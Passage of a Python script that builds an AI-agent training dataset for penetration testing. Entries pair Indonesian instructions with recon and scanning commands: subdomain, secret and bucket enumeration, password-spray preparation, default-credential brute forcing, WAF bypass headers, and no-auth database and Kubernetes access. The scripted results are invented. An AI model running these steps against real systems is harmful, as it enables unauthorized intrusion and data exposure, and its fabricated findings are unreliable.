"""PART1: header + REASONING_DATA entries 1-100"""
import json
from pathlib import Path
from shared.utils import setup_encoding, get_logger, root, save_jsonl

setup_encoding()
logger = get_logger("nexus.dataset_builder")
DS = root("datasets")

def _e(instruction, reasoning, planning, workflow, tools, reflection, memory, style, response):
    return {
        "instruction": instruction,
        "reasoning"  : reasoning,
        "planning"   : planning,
        "workflow"   : workflow,
        "tools"      : [{"tool": t, "purpose": p} for t, p in tools],
        "reflection" : reflection,
        "memory"     : memory,
        "style"      : style,
        "response"   : response,
    }

REASONING_DATA = [
    # ── RECON (1-20) ──────────────────────────────────────────────────────────
    _e("lakukan recon lengkap terhadap target domain corp.example.com",
       ["target adalah domain tunggal → mulai dari passive recon dulu",
        "gunakan subfinder untuk subdomain bruteforce tanpa kontak langsung",
        "dnsx untuk validasi DNS resolution, filter yang aktif saja",
        "httpx untuk probe HTTP/HTTPS, deteksi teknologi dan status",
        "baru setelah itu lakukan active scan dengan nuclei/nmap",
        "urutan: passive → validate → active mencegah false positive dan noise"],
       ["subfinder -d corp.example.com -silent -o subdomains.txt",
        "dnsx -l subdomains.txt -silent -o resolved.txt",
        "httpx -l resolved.txt -silent -title -status-code -o live.txt",
        "nmap -iL resolved.txt -T4 --open -oN ports.txt",
        "nuclei -l live.txt -severity medium,high,critical -o vulns.txt"],
       ["passive_recon","dns_validation","http_probe","port_scan","vuln_scan"],
       [("subfinder","passive subdomain enumeration"),("dnsx","DNS resolution validation"),
        ("httpx","HTTP probe dan tech fingerprint"),("nmap","port dan service scan"),
        ("nuclei","vulnerability detection")],
       "pastikan subdomain aktif divalidasi sebelum scan aktif untuk minimasi noise",
       "corp.example.com — recon scope authorized",
       "systematic reconnaissance analyst",
       "Memulai recon. Step 1: subfinder -d corp.example.com -silent -o subdomains.txt"),

    _e("temukan semua subdomain aktif dari target.org",
       ["domain tunggal → subfinder + amass untuk coverage maksimal",
        "dua tool recon → lebih banyak subdomain dari sumber berbeda",
        "gabungkan output, deduplicate, lalu validasi dengan dnsx",
        "passive first: tidak ada traffic ke target langsung"],
       ["subfinder -d target.org -o sub1.txt","amass enum -passive -d target.org -o sub2.txt",
        "sort -u sub1.txt sub2.txt > all_subs.txt","dnsx -l all_subs.txt -o resolved.txt"],
       ["subdomain_enum","merge_dedupe","dns_validate"],
       [("subfinder","subdomain bruteforce via passive sources"),
        ("amass","subdomain enum via OSINT + passive DNS"),("dnsx","DNS validation dan resolution")],
       "amass lebih lambat tapi lebih lengkap — trade-off coverage vs speed",
       "target.org — subdomain recon phase",
       "thorough recon analyst",
       "Dua tool recon untuk coverage maksimal. Menggabungkan output subfinder + amass."),

    _e("identifikasi teknologi web yang digunakan oleh https://shop.target.com",
       ["single URL → tidak perlu recon subdomain",
        "langsung fingerprinting: httpx + whatweb",
        "CMS detection penting untuk pilih scanner yang tepat",
        "WordPress → wpscan, Joomla → joomscan, generic → nuclei"],
       ["httpx -u https://shop.target.com -title -tech-detect -status-code",
        "whatweb https://shop.target.com --log-json=tech.json",
        "jika WordPress terdeteksi: wpscan --url https://shop.target.com"],
       ["http_fingerprint","tech_detect","cms_specific_scan"],
       [("httpx","HTTP probe dengan technology detection"),
        ("whatweb","web technology fingerprinting"),
        ("wpscan","WordPress-specific vulnerability scan")],
       "tech detection menentukan tool berikutnya — jangan skip langkah ini",
       "shop.target.com — e-commerce site, kemungkinan ada payment handling",
       "precise web analyst",
       "Fingerprinting https://shop.target.com. Deteksi: httpx -u https://shop.target.com -tech-detect"),

    _e("theHarvester untuk OSINT gathering pada company.com",
       ["OSINT = informasi publik tanpa akses langsung ke target",
        "theHarvester mengumpulkan: email, names, hosts, IPs dari search engines",
        "data points berguna untuk: phishing simulation, user enumeration",
        "pastikan hanya gunakan passive sources: google, bing, linkedin"],
       ["theHarvester -d company.com -l 200 -b google,bing,linkedin -f output.html",
        "parse output untuk extract email patterns",
        "gunakan email pattern untuk user enumeration di next step"],
       ["osint_harvest","email_extraction","pattern_analysis"],
       [("theHarvester","OSINT gathering dari public sources")],
       "theHarvester bisa timeout pada source tertentu — gunakan -b all hanya jika waktu cukup",
       "company.com — email format: firstname.lastname@company.com",
       "OSINT analyst",
       "OSINT gathering dimulai. theHarvester -d company.com -b google,bing,linkedin"),

    _e("gunakan shodan untuk external footprint perusahaan target.io",
       ["shodan menyimpan scan historis — tidak ada traffic ke target",
        "query: org:'Target Inc' OR hostname:target.io",
        "temukan exposed services: RDP, VNC, Elasticsearch, Kibana tanpa auth",
        "shodan CLI lebih fleksible untuk scripting daripada web UI"],
       ["shodan search 'org:\"Target Inc\"' --fields ip_str,port,product",
        "shodan host TARGET_IP (detail per IP)",
        "shodan search 'ssl.cert.subject.cn:target.io' untuk SSL cert recon"],
       ["shodan_org_search","host_detail","ssl_cert_recon"],
       [("shodan","internet-wide scan data aggregator")],
       "shodan data bisa outdated — verify manual setiap finding sebelum report",
       "target.io — Elasticsearch port 9200 exposed tanpa auth (shodan finding)",
       "OSINT footprint analyst",
       "Shodan query: org:'Target Inc' → 3 exposed services ditemukan termasuk Elasticsearch 9200"),

    _e("recon pasif menggunakan waybackmachine untuk endpoint discovery",
       ["wayback machine menyimpan snapshot URL historis — tidak ada traffic ke live target",
        "endpoint lama mungkin masih aktif atau memberikan informasi tentang struktur app",
        "gau (getallurls) mengagregasi dari wayback, alien vault, common crawl",
        "filter endpoint menarik: admin, api, backup, config, upload"],
       ["gau target.com | tee all_urls.txt",
        "cat all_urls.txt | grep -E 'admin|api|backup|config|upload|\.php|\.asp'",
        "katana -u https://target.com -d 3 -silent -o crawled.txt"],
       ["historical_url_collect","endpoint_filter","live_crawl"],
       [("gau","historical URL aggregation dari multiple sources"),
        ("katana","modern web crawler")],
       "endpoint historis sering lead ke forgotten functionality yang tidak di-patch",
       "target.com — /api/v1/ endpoint ditemukan dari wayback, masih aktif dan unauthenticated",
       "historical recon specialist",
       "GAU recon: gau target.com → 2340 historical URLs, filtering high-value endpoints..."),

    _e("enumerate git repository publik untuk secret leakage pada org github.com/targetcorp",
       ["GitHub org repo bisa mengandung secrets yang ter-commit secara tidak sengaja",
        "trufflehog untuk scan git history secara depth",
        "fokus: API keys, database credentials, JWT secrets, private keys",
        "check semua repo termasuk yang archived"],
       ["trufflehog github --org targetcorp --include-unverified",
        "gitleaks detect --source . setelah clone tiap repo",
        "gh repo list targetcorp --limit 100 untuk enumerate semua repo"],
       ["repo_enumerate","history_scan","secret_extract","verify_valid"],
       [("trufflehog","git history secret scanner"),("gitleaks","secret detection tool"),
        ("gh CLI","GitHub repository enumeration")],
       "scan git history bukan hanya current code — secret yang dihapus masih ada di history",
       "targetcorp — 3 repos dengan AWS keys, 1 dengan DB password dalam git history",
       "secret recon analyst",
       "GitHub org scan: trufflehog github --org targetcorp → scanning 47 repositories..."),

    _e("DNS zone transfer attempt pada ns1.target.com",
       ["zone transfer (AXFR) = mendapatkan semua DNS records sekaligus",
        "sering misconfigured terutama pada internal DNS server",
        "dig AXFR untuk test, jika berhasil = critical misconfiguration",
        "informasi dari AXFR: semua hostname internal, IP mapping"],
       ["dig axfr target.com @ns1.target.com",
        "host -t AXFR target.com ns1.target.com",
        "dnsx -d target.com -axfr jika dig tidak available"],
       ["axfr_attempt","zone_data_extract","internal_map"],
       [("dig","DNS zone transfer tool"),("dnsx","DNS toolkit")],
       "zone transfer berhasil = semua internal hosts terekspos — critical finding",
       "ns1.target.com — AXFR berhasil: 340 internal DNS records terekspos",
       "DNS security analyst",
       "Zone transfer attempt: dig axfr target.com @ns1.target.com → AXFR SUCCESS! 340 records"),

    _e("ASN lookup dan IP range mapping untuk target perusahaan besar",
       ["perusahaan besar memiliki ASN sendiri = banyak IP range yang perlu di-scope",
        "whois ASN untuk dapatkan semua IP range yang dimiliki",
        "bgp.he.net atau asnlookup untuk visualisasi",
        "setiap IP range harus masuk dalam scope sebelum scan"],
       ["whois -h whois.radb.net -- '-i origin AS12345'",
        "curl https://api.bgpview.io/asn/12345/prefixes",
        "nmap -sn -iL ip_ranges.txt untuk host discovery per range"],
       ["asn_lookup","prefix_collect","scope_define","host_discovery"],
       [("whois","ASN dan IP ownership lookup"),("nmap","host discovery per range")],
       "konfirmasi scope dengan client sebelum scan IP ranges dari ASN — bisa sangat besar",
       "AS12345 — 15 IP ranges, total /16 space, 3 datacenter locations",
       "network scope analyst",
       "ASN lookup: AS12345 → 15 IP prefixes found. Defining scan scope..."),

    _e("certificate transparency log mining untuk subdomain discovery",
       ["CT logs = public record semua TLS certificates yang diissued",
        "crtsh.io menyimpan CT log data dan searchable",
        "sangat efektif untuk wildcard cert discovery",
        "combine dengan subfinder untuk coverage maksimal"],
       ["curl 'https://crt.sh/?q=%.target.com&output=json' | jq '.[].name_value'",
        "python3 -c \"import requests,json; ...(crtsh query)...\"",
        "sort -u subdomains dari CT log → merge dengan subfinder output"],
       ["ct_log_query","cert_extract","subdomain_merge","dns_validate"],
       [("crt.sh","certificate transparency log database"),("subfinder","passive subdomain enum")],
       "CT log kadang mengandung internal/dev subdomain yang bocor via public cert",
       "target.com — 12 subdomain baru dari CT log yang tidak ditemukan subfinder",
       "certificate intelligence analyst",
       "CT log mining: crt.sh query target.com → 67 certificates, 89 unique subdomains"),

    _e("recon LinkedIn untuk employee enumeration pada target organization",
       ["LinkedIn adalah goldmine untuk employee info: name, role, email pattern",
        "linkedin2username untuk generate potential usernames dari employee list",
        "email format: first.last, flast, firstl — verify dengan hunter.io",
        "gunakan untuk password spray target user list"],
       ["theHarvester -d company.com -b linkedin",
        "linkedin2username -c 'Company Name' -n 50",
        "hunter.io API untuk verify email format dan existence"],
       ["employee_enum","username_gen","email_verify","spray_prep"],
       [("theHarvester","LinkedIn OSINT"),("linkedin2username","username generation dari LinkedIn")],
       "LinkedIn scraping ada rate limit — jangan terlalu agresif atau account akan di-block",
       "Company Name — 150 employees enumerated, email format: first.last@company.com",
       "social OSINT analyst",
       "LinkedIn enum: linkedin2username -c 'Company Name' → 150 potential usernames"),

    _e("recon passive menggunakan FOFA dan Censys untuk exposed services",
       ["FOFA dan Censys adalah alternatif Shodan dengan data berbeda",
        "Censys lebih baik untuk TLS/certificate analysis",
        "FOFA populer di Asia dengan coverage berbeda dari Shodan",
        "combine semua 3 untuk coverage maksimal"],
       ["censys search 'target.com' --index certificates",
        "fofa query: domain='target.com'",
        "merge results dan remove duplicates sebelum verify"],
       ["censys_query","fofa_query","result_merge","manual_verify"],
       [("censys","internet scan database dengan certificate focus"),
        ("fofa","internet asset search engine")],
       "berbagai search engine memiliki berbagai coverage — kombinasi memberikan hasil terbaik",
       "target.com — Censys menemukan 2 expired cert + 1 misconfigured server yang Shodan miss",
       "multi-source OSINT analyst",
       "Multi-source recon: Shodan + Censys + FOFA → combining results for target.com"),

    _e("passive DNS analysis untuk track subdomain changes over time",
       ["passive DNS = historical DNS query data dari berbagai sumber",
        "farsight DNSDB, virustotal, atau securitytrails untuk historical data",
        "berguna untuk: find old infrastructure, track CDN changes, discover dev subdomains",
        "perubahan DNS bisa indicate infrastructure migration atau new services"],
       ["securitytrails domain:target.com (historical DNS)",
        "virustotal subdomains:target.com",
        "dnsx -d target.com -r public-resolvers.txt (multi-resolver check)"],
       ["historical_dns_query","change_analysis","dev_subdomain_hunt"],
       [("securitytrails","historical DNS dan subdomain data"),
        ("virustotal","passive DNS aggregation")],
       "old dev/staging subdomains sering masih accessible dan less secured",
       "target.com — dev.target.com dan staging.target.com dari historical DNS, masih aktif",
       "passive DNS analyst",
       "Historical DNS query: securitytrails → dev.target.com ditemukan, resolves ke 10.x.x.x"),

    _e("enumerate cloud storage buckets untuk target menggunakan cloud_enum",
       ["cloud storage misconfiguration = data exposure yang sering terjadi",
        "cloud_enum test: AWS S3, GCS, Azure Blob dengan berbagai naming convention",
        "target name + common suffixes: -backup, -dev, -prod, -data, -files",
        "buka public bucket = bisa download semua isi tanpa auth"],
       ["cloud_enum -k targetcorp --disable-azure (fokus S3 + GCS dulu)",
        "aws s3 ls s3://targetcorp-backup --no-sign-request (check public)",
        "gcloud storage ls gs://targetcorp-data (GCS check)"],
       ["bucket_enum","public_access_check","content_list","data_assess"],
       [("cloud_enum","multi-cloud storage enumeration"),("aws CLI","S3 bucket access test")],
       "jangan download data dari bucket publik kecuali diperlukan sebagai PoC — minimize footprint",
       "targetcorp — S3 bucket 'targetcorp-backup' public, berisi database dump lama",
       "cloud storage analyst",
       "Bucket enum: cloud_enum -k targetcorp → targetcorp-backup S3 bucket found, public access!"),

    _e("dorking Google untuk informasi sensitif tentang target.com",
       ["Google dorks = advanced search operators untuk temukan informasi sensitif",
        "dorks berguna: site:, filetype:, inurl:, intitle:",
        "GHDB (Google Hacking Database) berisi 5000+ dork untuk berbagai scenario",
        "selalu kombinasikan beberapa dork untuk coverage"],
       ["site:target.com filetype:pdf (find documents)",
        "site:target.com inurl:admin OR inurl:login",
        "site:target.com filetype:sql OR filetype:bak",
        "intitle:'index of' site:target.com (directory listing)"],
       ["basic_dork","sensitive_file_hunt","admin_panel_find","dir_listing"],
       [("google","search engine dorking untuk OSINT")],
       "robots.txt dan sitemap.xml sering diabaikan tapi mengandung path yang tidak untuk publik",
       "target.com — /admin/login ditemukan via dork, filetype:bak mengexpose backup file",
       "Google dork analyst",
       "Google dorking: site:target.com filetype:sql → database backup file found!"),

    _e("network topology discovery menggunakan traceroute dan path analysis",
       ["traceroute reveal network hops antara attacker dan target",
        "berguna untuk understand network architecture dan potential pivot points",
        "paris-traceroute lebih akurat untuk ECMP networks",
        "combine dengan IP geolocation untuk physical location context"],
       ["traceroute -n target.com",
        "mtr --report target.com (more detailed)",
        "paris-traceroute target.com (ECMP-aware)"],
       ["path_trace","hop_analysis","network_topo_map"],
       [("traceroute","network path discovery"),("mtr","interactive path analysis")],
       "CDN di depan server bisa menyembunyikan real IP — gunakan history + email header analysis",
       "target.com — 8 hops, CDN Cloudflare detected, real IP hidden",
       "network topology analyst",
       "Traceroute: target.com → 8 hops, Cloudflare CDN detected at hop 4"),

    _e("fingerprint WAF yang digunakan oleh target dengan wafw00f",
       ["WAF detection penting sebelum scanning — scan tanpa WAF bypass = blocked",
        "wafw00f untuk identify WAF vendor dari HTTP response patterns",
        "berbeda WAF = bypass technique berbeda",
        "Cloudflare, Akamai, AWS WAF masing-masing punya karakteristik berbeda"],
       ["wafw00f https://target.com",
        "curl -H 'X-Forwarded-For: 127.0.0.1' https://target.com (WAF bypass test)",
        "nmap --script http-waf-detect https://target.com"],
       ["waf_detect","vendor_identify","bypass_research"],
       [("wafw00f","WAF fingerprinting tool"),("nmap","WAF detection scripts")],
       "WAF bypass technique berbeda per vendor — selalu identify dulu sebelum scan agresif",
       "target.com — Cloudflare WAF detected, menggunakan bypass: CF-Connecting-IP header",
       "WAF analysis specialist",
       "WAF detection: wafw00f https://target.com → Cloudflare detected. Planning bypass strategy."),

    _e("recon email infrastructure untuk target: MX, SPF, DKIM, DMARC",
       ["email security config recon berguna untuk: spoof test, phishing prep",
        "missing DMARC = bisa spoof email dari domain",
        "SPF tanpa hardfail = bisa relay dari unauthorized server",
        "DKIM missing = email forgery lebih mudah"],
       ["dig MX target.com",
        "dig TXT target.com | grep -E 'spf|dmarc|dkim'",
        "mailspoofcheck target.com (automated email security check)"],
       ["mx_lookup","spf_check","dkim_check","dmarc_check","spoof_assess"],
       [("dig","DNS record lookup"),("mailspoofcheck","email security configuration checker")],
       "missing DMARC p=reject = email spoofing possible — critical finding untuk phishing assessment",
       "target.com — DMARC missing, SPF softfail only → email spoofing feasible",
       "email security analyst",
       "Email security recon: dig TXT target.com → SPF softfail, DMARC missing!"),

    _e("passive recon menggunakan spiderfoot untuk comprehensive OSINT",
       ["spiderfoot mengautomasi 100+ OSINT source dalam satu tool",
        "jalankan dengan target: domain, IP, email, username",
        "butuh API keys untuk beberapa modules (Shodan, Hunter, VirusTotal)",
        "hasilkan graph relationship antara entities"],
       ["spiderfoot -s target.com -m sfp_shodan,sfp_virustotal,sfp_dns (selective modules)",
        "spiderfoot -s target.com (full scan, lambat tapi comprehensive)",
        "review web UI: http://localhost:5001 untuk visualisasi"],
       ["target_define","module_select","full_osint_run","graph_review"],
       [("spiderfoot","automated OSINT framework dengan 100+ modules")],
       "spiderfoot full scan bisa makan waktu berjam-jam — pilih module yang relevan",
       "target.com — spiderfoot: 340 entities ditemukan, 15 email addresses, 23 IPs linked",
       "automated OSINT analyst",
       "SpiderFoot: spiderfoot -s target.com → 340 entities discovered, building relationship graph"),

    _e("enumerate IPv6 addresses dari target untuk bypass IPv4 controls",
       ["IPv4 security controls sering tidak apply ke IPv6 — potential bypass",
        "banyak server expose service di IPv6 tapi lupa secure seperti IPv4",
        "dnsx untuk query AAAA records",
        "nmap mendukung IPv6 scan dengan -6 flag"],
       ["dnsx -l domains.txt -aaaa -silent (query IPv6 records)",
        "nmap -6 -sV 2001:db8::1 (IPv6 scan)",
        "nmap -6 -sn --script ipv6-multicast-mld-list fe80::1 (local IPv6 discovery)"],
       ["ipv6_dns_query","ipv6_port_scan","bypass_test"],
       [("dnsx","IPv6 DNS query"),("nmap","IPv6 port scanning")],
       "admin interface yang hanya accessible via IPv6 sering lebih lenient dari IPv4 counterpart",
       "target.com — admin panel hanya accessible via IPv6, tidak ada WAF di IPv6 path",
       "IPv6 security analyst",
       "IPv6 recon: dnsx -aaaa → 3 services exposed via IPv6 only, including admin panel!"),

    # ── SCAN (21-40) ──────────────────────────────────────────────────────────
    _e("port scan pada 192.168.1.0/24 untuk asset discovery",
       ["subnet /24 = 256 host — jangan scan satu per satu",
        "mulai dengan fast host discovery: nmap -sn",
        "filter live hosts, baru scan port pada yang aktif",
        "T4 timing untuk balance speed vs reliability di internal network"],
       ["nmap -sn 192.168.1.0/24 -oG alive.txt",
        "grep 'Up' alive.txt | awk '{print $2}' > live_hosts.txt",
        "nmap -iL live_hosts.txt -T4 --open -sV -oN full_scan.txt"],
       ["host_discovery","filter_live","service_scan"],
       [("nmap","host discovery dan port scan")],
       "sV (service version) lebih lambat — gunakan hanya pada live hosts untuk efisiensi",
       "192.168.1.0/24 internal network, 12 host aktif ditemukan",
       "systematic network scanner",
       "Host discovery selesai. Menjalankan service scan pada live hosts."),

    _e("scan kerentanan pada web server 10.0.0.100",
       ["single IP dengan web server → fokus pada HTTP/HTTPS ports dulu",
        "nikto untuk quick web vuln scan",
        "nuclei untuk template-based CVE check",
        "testssl jika HTTPS: detect SSL/TLS misconfiguration"],
       ["nmap -sV -p 80,443,8080,8443 10.0.0.100",
        "nikto -h 10.0.0.100 -o nikto_report.txt",
        "nuclei -target http://10.0.0.100 -severity medium,high,critical",
        "testssl.sh 10.0.0.100:443"],
       ["port_identify","web_vuln_scan","ssl_check","report"],
       [("nmap","identify web ports dan services"),("nikto","generic web vulnerability scan"),
        ("nuclei","CVE template-based scan"),("testssl.sh","SSL/TLS configuration audit")],
       "false positive rate nikto cukup tinggi — verify manual sebelum report",
       "10.0.0.100 — Apache 2.4.49 terdeteksi (CVE-2021-41773 kandidat)",
       "vulnerability scanner",
       "Web server 10.0.0.100 — Apache 2.4.49 terdeteksi. Running CVE-2021-41773 check."),

    _e("jalankan AutoRecon pada target 10.10.10.50 untuk CTF",
       ["AutoRecon = automated multi-scan tool, ideal untuk CTF",
        "jalankan dulu nmap full port untuk tidak ada port yang terlewat",
        "AutoRecon otomatis trigger service-specific scripts",
        "CTF context → lebih agresif, tidak perlu stealth"],
       ["autorecon 10.10.10.50",
        "review results/10.10.10.50/ setelah selesai",
        "fokus pada unusual ports dan default credential services"],
       ["full_enum","service_specific_scan","result_review"],
       [("autorecon","automated comprehensive enumeration tool")],
       "AutoRecon bisa lambat — jalankan background, review hasil saat selesai",
       "10.10.10.50 CTF target — AutoRecon sedang berjalan",
       "CTF enumeration",
       "AutoRecon started: autorecon 10.10.10.50. Estimasi 10-15 menit."),

    _e("scan UDP services pada target 10.0.0.50 yang mungkin terlewat TCP scan",
       ["UDP scan sering diabaikan — banyak service kritis di UDP: DNS, SNMP, TFTP, NTP",
        "nmap -sU lebih lambat dari TCP karena UDP stateless",
        "mulai dengan top 100 UDP ports untuk efisiensi",
        "SNMP (161) adalah high-value target jika community string default"],
       ["nmap -sU --top-ports 100 10.0.0.50 -oN udp_scan.txt",
        "snmpwalk -v2c -c public 10.0.0.50 (jika SNMP 161 open)",
        "onesixtyone -c community_strings.txt 10.0.0.50 (SNMP community brute)"],
       ["udp_top_scan","snmp_check","tftp_check","ntp_check"],
       [("nmap","UDP port scanning"),("snmpwalk","SNMP data extraction"),
        ("onesixtyone","SNMP community string brute force")],
       "SNMP dengan community string 'public' = full system information disclosure",
       "10.0.0.50 — SNMP 161 open, community string 'public', sysInfo exposed",
       "UDP scan specialist",
       "UDP scan: nmap -sU --top-ports 100 10.0.0.50 → SNMP 161 open! Testing community strings..."),

    _e("scan SSL/TLS configuration untuk detect weak ciphers dan vulnerabilities",
       ["TLS misconfiguration = POODLE, BEAST, HEARTBLEED, ROBOT vulnerabilities",
        "testssl.sh adalah tool terlengkap untuk TLS audit",
        "check: protocol versions (SSLv2, SSLv3, TLS 1.0/1.1 deprecated), cipher suites",
        "certificate: expiry, wildcard, SAN, chain validation"],
       ["testssl.sh --full https://target.com",
        "testssl.sh --heartbleed --poodle https://target.com (specific vuln check)",
        "sslyze --regular target.com:443 (Python alternative)"],
       ["full_tls_audit","specific_vuln_check","cert_validate","cipher_review"],
       [("testssl.sh","comprehensive TLS/SSL security scanner"),
        ("sslyze","TLS scanner dengan Python")],
       "TLS 1.0/1.1 = deprecated, harus dilaporkan; SSLv2/3 = critical misconfiguration",
       "target.com — TLS 1.0 enabled, SWEET32 vulnerable, cert expiry 30 hari",
       "TLS security auditor",
       "TLS audit: testssl.sh --full https://target.com → TLS 1.0 enabled, SWEET32 detected!"),

    _e("vulnerability scan infrastruktur internal dengan Nessus/OpenVAS",
       ["Nessus/OpenVAS = comprehensive vulnerability scanner dengan plugin database",
        "scan authenticated vs unauthenticated — authenticated jauh lebih comprehensive",
        "setup credentials: SSH key untuk Linux, local admin untuk Windows",
        "schedule scan di non-business hours untuk minimize impact"],
       ["openvas-start (start OpenVAS service)",
        "buat scan task dengan target range di web UI",
        "configure credentials: SSH, SMB, SNMP",
        "review report: filter Critical dan High severity"],
       ["service_start","task_create","cred_config","scan_run","report_review"],
       [("openvas","open source vulnerability scanner"),("nessus","commercial vulnerability scanner")],
       "authenticated scan menemukan 3-5x lebih banyak vulnerability dari unauthenticated",
       "192.168.1.0/24 — OpenVAS: 45 critical, 123 high vulnerabilities dalam 2 jam scan",
       "vulnerability assessment specialist",
       "OpenVAS scan dimulai dengan kredensial SSH. Target: 192.168.1.0/24, estimasi 2 jam."),

    _e("recon service FTP pada target untuk anonymous login check",
       ["FTP anonymous login = common misconfiguration, data exposure langsung",
        "nmap script ftp-anon untuk automated check",
        "jika anonymous allowed: list dan download file yang menarik",
        "perhatikan: writable directory = potential untuk upload webshell"],
       ["nmap --script ftp-anon -p 21 10.0.0.50",
        "ftp 10.0.0.50 (login anonymous:anonymous@)",
        "ls -la (list files setelah connect)"],
       ["anon_check","ftp_connect","file_list","sensitive_file_dl"],
       [("nmap","FTP anonymous login check script"),("ftp","FTP client")],
       "download hanya file yang diperlukan sebagai evidence — jangan mass download",
       "10.0.0.50 FTP — anonymous login allowed, /pub berisi database backup dari 2023",
       "FTP security analyst",
       "FTP anonymous check: nmap --script ftp-anon 10.0.0.50 → ALLOWED! Connecting..."),

    _e("scan untuk default credentials pada network devices",
       ["default credentials = router, switch, printer, IoT devices dengan password factory",
        "common: admin/admin, admin/password, root/root, admin/(blank)",
        "nmap NSE scripts untuk specific service default cred check",
        "medusa untuk parallel brute dengan default cred list"],
       ["nmap --script http-default-accounts -p 80,443,8080 10.0.0.0/24",
        "medusa -H hosts.txt -C /usr/share/medusa/combo-default.txt -M http",
        "hydra -C default_creds.txt -M ssh host_list.txt"],
       ["service_identify","default_cred_test","success_document"],
       [("nmap","default credential check scripts"),("medusa","parallel credential testing")],
       "default cred check adalah quick win — sering ditemukan di IoT dan network devices",
       "network scan — 3 devices dengan default creds: router admin/admin, printer admin/(blank)",
       "default credential hunter",
       "Default cred scan: nmap --script http-default-accounts → 3 devices vulnerable!"),

    _e("scan untuk SMB vulnerabilities pada Windows hosts di 10.0.0.0/24",
       ["SMB = Windows file sharing, sering vulnerable: EternalBlue, PrintNightmare, ZeroLogon",
        "nmap SMB scripts untuk comprehensive check",
        "crackmapexec untuk enumeration dan vuln detection",
        "MS17-010 (EternalBlue) masih relevan di environment yang belum patch"],
       ["nmap --script smb-vuln-* -p 445 10.0.0.0/24",
        "crackmapexec smb 10.0.0.0/24 --gen-relay-list relay_targets.txt",
        "impacket-smbclient //10.0.0.50/C$ (SMB share access test)"],
       ["smb_vuln_scan","relay_assess","share_enum"],
       [("nmap","SMB vulnerability scripts"),("crackmapexec","SMB enumeration"),
        ("impacket","Windows protocol toolkit")],
       "SMB signing disabled = NTLM relay attack possible — check dengan crackmapexec --gen-relay-list",
       "10.0.0.0/24 — 3 hosts MS17-010 vulnerable, 8 hosts SMB signing disabled",
       "Windows network security scanner",
       "SMB scan: nmap --script smb-vuln-* → MS17-010 on 3 hosts, relay targets: 8"),

    _e("scan untuk web application firewall bypass menggunakan nmap http scripts",
       ["WAF bypass via nmap scripts untuk initial check sebelum manual testing",
        "http-headers: lihat security headers yang ada/tidak ada",
        "http-methods: check apakah PUT, DELETE, TRACE diaktifkan",
        "http-auth-finder: detect authentication method"],
       ["nmap --script http-headers,http-methods,http-auth-finder -p 80,443 target.com",
        "curl -X OPTIONS target.com -v (manual method check)",
        "curl -X TRACE target.com -v (TRACE method check — XST vulnerability)"],
       ["header_check","method_check","auth_detect","trace_check"],
       [("nmap","HTTP security scripts"),("curl","manual HTTP testing")],
       "TRACE method enabled = Cross-Site Tracing (XST) vulnerability — report ke dev",
       "target.com — X-Frame-Options missing, TRACE method enabled, no CSP header",
       "web security header analyst",
       "HTTP security: nmap http-headers,http-methods → TRACE enabled, headers missing!"),

    _e("comprehensive scan Jenkins CI/CD server untuk security issues",
       ["Jenkins = CI/CD platform yang sering misconfigured",
        "anonymous access enabled = code execution via Groovy script console",
        "exposed credentials dalam build logs atau environment variables",
        "Jenkins sering berjalan sebagai service account dengan tinggi privilege"],
       ["nmap -sV -p 8080 jenkins.target.com",
        "curl http://jenkins.target.com/script (Groovy console check)",
        "nuclei -u http://jenkins.target.com -tags jenkins",
        "gobuster dir -u http://jenkins.target.com -w /usr/share/wordlists/dirb/common.txt"],
       ["service_detect","anonymous_check","groovy_test","plugin_enum"],
       [("nmap","service detection"),("nuclei","Jenkins CVE templates"),
        ("gobuster","Jenkins path enumeration")],
       "Jenkins script console = RCE jika anonymous access allowed — highest priority check",
       "jenkins.target.com — anonymous access enabled, Groovy console accessible, RCE confirmed",
       "CI/CD security analyst",
       "Jenkins scan: anonymous access check → http://jenkins.target.com/script accessible! RCE possible."),

    _e("enumerate Kubernetes API untuk misconfiguration",
       ["Kubernetes API server adalah control plane — misconfiguration = cluster compromise",
        "anonymous access atau service account token exposure = critical",
        "kubectl dengan --insecure-skip-tls-verify untuk test",
        "kube-hunter untuk automated Kubernetes security scan"],
       ["curl https://k8s.target.com:6443/api/v1/namespaces --insecure (anon check)",
        "kube-hunter --remote k8s.target.com",
        "kubectl --server=https://k8s.target.com:6443 --insecure-skip-tls-verify get pods --all-namespaces"],
       ["api_access_check","kube_hunter_scan","resource_enum","secret_check"],
       [("kube-hunter","Kubernetes security scanner"),("kubectl","Kubernetes CLI client")],
       "Kubernetes secret listing = bisa access semua credentials dalam cluster — critical finding",
       "k8s.target.com — API anonymous access allowed, 12 namespaces, secrets listable",
       "Kubernetes security analyst",
       "K8s scan: curl https://k8s.target.com:6443/api → anonymous access! kube-hunter running..."),

    _e("scan printer dan embedded devices untuk security issues di office network",
       ["printer = sering ignored dalam security assessment tapi bisa high-value",
        "web admin tanpa password, SNMP community public, telnet access",
        "PJL (Printer Job Language) commands untuk info disclosure dan manipulation",
        "printer bisa di-exploit untuk lateral movement via internal network access"],
       ["nmap -sV -p 80,443,9100,515,631 10.0.0.0/24 --open",
        "nmap --script pjl-ready-message,printer-info 10.0.0.50",
        "curl http://printer.internal/hp/device/info (HP web interface)"],
       ["printer_discover","service_check","pjl_test","web_interface_access"],
       [("nmap","printer service detection"),("nmap scripts","PJL dan printer recon")],
       "printer dengan akses ke internal network bisa digunakan sebagai jump point",
       "office network — 5 HP printers tanpa auth, PJL commands enabled, web admin accessible",
       "embedded device security analyst",
       "Printer scan: nmap -p 9100,515,631 → 5 printers, PJL accessible, no auth!"),

    _e("scan untuk database services yang exposed ke internet",
       ["database tanpa auth ke internet = immediate critical finding",
        "common: MongoDB (27017), Redis (6379), Elasticsearch (9200), MySQL (3306)",
        "nmap untuk detect, langsung test akses tanpa credential",
        "data exposure assessment: berapa record, apa jenis data"],
       ["nmap -sV -p 27017,6379,9200,3306,5432,1433 target.com",
        "mongo --host target.com (MongoDB no-auth test)",
        "redis-cli -h target.com info (Redis no-auth test)",
        "curl http://target.com:9200/_cat/indices (Elasticsearch index list)"],
       ["db_port_scan","no_auth_test","data_exposure_assess"],
       [("nmap","database port detection"),("mongo","MongoDB client"),
        ("redis-cli","Redis client"),("curl","Elasticsearch API test")],
       "MongoDB atau Redis tanpa auth = immediate report ke client — data exposure risk",
       "target.com — MongoDB 27017 no-auth, 1.2M records customer data accessible",
       "database security analyst",
       "DB exposure scan: nmap → MongoDB 27017 open! No-auth test → 1.2M records accessible!"),

    # ── WEB (41-70) ───────────────────────────────────────────────────────────
    _e("test SQL injection pada form login https://app.target.com/login",
       ["form login → high priority target untuk SQLi",
